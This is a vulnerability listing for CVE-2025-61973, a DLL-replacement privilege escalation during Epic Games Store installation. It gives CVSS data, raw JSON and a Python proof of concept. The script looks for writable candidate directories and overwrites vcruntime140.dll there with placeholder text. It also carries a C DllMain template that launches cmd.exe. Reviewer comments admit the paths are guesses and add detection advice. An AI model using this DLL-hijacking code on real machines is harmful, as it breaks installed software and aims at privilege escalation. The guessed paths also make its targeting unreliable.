Security Vulnerability Report
CVE-2025-61973 CVSS 8.8 HIGH

CVE-2025-61973

Published: 2026-01-15 16:16:11
Last Modified: 2026-04-15 00:35:42

Description

A local privilege escalation vulnerability exists during the installation of Epic Games Store via the Microsoft Store. A low-privilege user can replace a DLL file during the installation process, which may result in unintended elevation of privileges.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Epic Games Store < fixed version (version number not given on this page)
Epic Games Launcher < fixed version (version number not given on this page)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
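#!/usr/bin/env python3
# CVE-2025-61973 PoC - Epic Games Store DLL Hijacking Local Privilege Escalation
# Author: Security Researcher
# Note: This PoC is for educational and authorized testing purposes only
#
# Reviewer notes (read before relying on this listing):
#   * The advisory text on this page says only that a DLL can be replaced
#     during installation via the Microsoft Store. It names neither the DLL
#     nor the directory; the file name and directories used below are this
#     script's own guesses. Consult the referenced TALOS-2025-2279 report for
#     the actual affected file and path.
#   * check_vulnerability() is a heuristic. A True result means only that a
#     candidate directory exists and os.access() did not refuse it. It is not
#     evidence that the installed version is affected.
#   * exploit() writes a text placeholder and never compiles the C template,
#     so its one real effect is to overwrite (after a .bak copy) a file named
#     vcruntime140.dll in each candidate directory.
#   * Defensive takeaways: apply the vendor's fixed release; keep installer
#     working directories non-writable for standard users; alert on DLL
#     creation or modification by non-admin accounts in installer paths
#     (e.g. Sysmon FileCreate, event ID 11) and on unsigned image loads by
#     elevated installer processes (Sysmon ImageLoad, event ID 7).
import os
import sys
import ctypes
import shutil
import time


def create_malicious_dll():
    """Return the C source text of the demonstration DllMain.

    The template's DllMain starts cmd.exe on DLL_PROCESS_ATTACH to write the
    output of ``whoami`` to a file. The text is only returned; nothing in this
    script compiles it or writes it to disk.
    """
    dll_template = '''
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Create elevated command prompt or execute payload
        STARTUPINFO si = {0};
        PROCESS_INFORMATION pi = {0};
        si.cb = sizeof(si);

        // Execute payload with elevated privileges
        CreateProcess(
            "C:\\\\Windows\\\\System32\\\\cmd.exe",
            "/c whoami > C:\\\\\\\\temp\\\\\\\\priv_esc_result.txt",
            NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi
        );
    }
    return TRUE;
}
'''
    return dll_template


def find_dll_loading_path():
    """Return the candidate directories that exist on this machine.

    The list is hard-coded by the script author and is not taken from the
    advisory, so an entry appearing here does not mean the installer loads
    DLLs from it.
    """
    paths = [
        os.path.expanduser("~\\\\AppData\\\\Local\\\\EpicGamesLauncher\\\\"),
        "C:\\\\Program Files\\\\Epic Games\\\\",
        "C:\\\\Program Files (x86)\\\\Epic Games\\\\",
    ]
    # Only add the WindowsApps candidate when LOCALAPPDATA is set; the original
    # concatenated onto '' and produced a root-relative path instead.
    local_app_data = os.environ.get('LOCALAPPDATA', '')
    if local_app_data:
        paths.append(local_app_data + "\\\\Microsoft\\\\WindowsApps\\\\")
    return [p for p in paths if os.path.exists(os.path.dirname(p))]


def check_vulnerability():
    """Heuristically report whether a candidate directory looks writable.

    Returns:
        True if the caller is not an administrator and os.access() reports
        W_OK for at least one candidate directory; False otherwise, including
        on platforms without ``ctypes.windll``.

    Limitations:
        The result does not inspect the installed product version or the
        installer's real DLL search order. On Windows, os.access() consults
        the read-only attribute rather than the directory ACL, and the first
        candidate lives inside the user's own profile, so False positives are
        expected. Treat True as "worth checking against the advisory", not as
        confirmation.
    """
    print("[*] Checking for CVE-2025-61973 vulnerability...")
    print("[*] Target: Epic Games Store DLL Hijacking")

    # ctypes.windll exists only on Windows; without this guard the script
    # dies with AttributeError everywhere else.
    windll = getattr(ctypes, "windll", None)
    if windll is None:
        print("[-] ctypes.windll is unavailable: this check only applies to Windows")
        return False

    # Check if running with low privileges
    is_admin = windll.shell32.IsUserAnAdmin()
    print(f"[*] Current user is administrator: {is_admin}")
    if is_admin:
        print("[!] Already running as administrator, vulnerability not applicable")
        return False

    # Find potential DLL loading paths
    dll_paths = find_dll_loading_path()
    print(f"[*] Found {len(dll_paths)} potential DLL paths")
    for path in dll_paths:
        if os.access(path, os.W_OK):
            print(f"[!] Writable path found: {path}")
            return True

    print("[*] No obvious writable DLL paths found")
    return False


def exploit():
    """Write a placeholder file named vcruntime140.dll into each candidate path.

    For every directory from find_dll_loading_path(), any existing
    vcruntime140.dll is copied to ``<name>.bak`` and then overwritten with a
    fixed text string. No DLL is compiled or loaded by this function; the
    unused call to create_malicious_dll() was dropped because its result was
    discarded. The overwrite breaks whatever legitimately used that file
    until the .bak copy is restored.
    """
    print("[*] Starting CVE-2025-61973 exploitation...")

    # Find target path
    target_paths = find_dll_loading_path()
    for target_path in target_paths:
        try:
            dll_name = "vcruntime140.dll"  # Common DLL name for hijacking
            dll_path = os.path.join(target_path, dll_name)

            # Backup existing DLL if exists
            if os.path.exists(dll_path):
                backup_path = dll_path + ".bak"
                shutil.copy2(dll_path, backup_path)
                print(f"[*] Backed up original DLL to {backup_path}")

            # Text mode on purpose: the content is a placeholder string, not a
            # PE image, so nothing written here can be loaded as a DLL.
            with open(dll_path, 'w') as f:
                f.write("MALICIOUS DLL CONTENT - Replace with compiled DLL")
            print(f"[!] Malicious DLL placed at: {dll_path}")
            print("[*] Wait for Epic Games Store installation/update to trigger payload")
        except PermissionError:
            print(f"[-] Permission denied: {target_path}")
            continue
        except Exception as e:
            # Best-effort loop: report the failure and move to the next path.
            print(f"[-] Error: {e}")
            continue


if __name__ == "__main__":
    print("CVE-2025-61973 PoC - Epic Games Store DLL Hijacking")
    print("=" * 60)
    if check_vulnerability():
        print("[+] System appears to be vulnerable")
        response = input("[*] Proceed with exploitation? (y/N): ")
        if response.lower() == 'y':
            exploit()
    else:
        print("[-] System may not be vulnerable or Epic Games Store not installed")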

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61973", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:11.320", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A local privilege escalation vulnerability exists during the installation of Epic Games Store via the Microsoft Store. A low-privilege user can replace a DLL file during the installation process, which may result in unintended elevation of privileges."}, {"lang": "es", "value": "Una vulnerabilidad de escalada de privilegios local existe durante la instalación de Epic Games Store a través de la Microsoft Store. Un usuario con pocos privilegios puede reemplazar un archivo DLL durante el proceso de instalación, lo que puede resultar en una elevación de privilegios no intencionada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2279", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2279", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}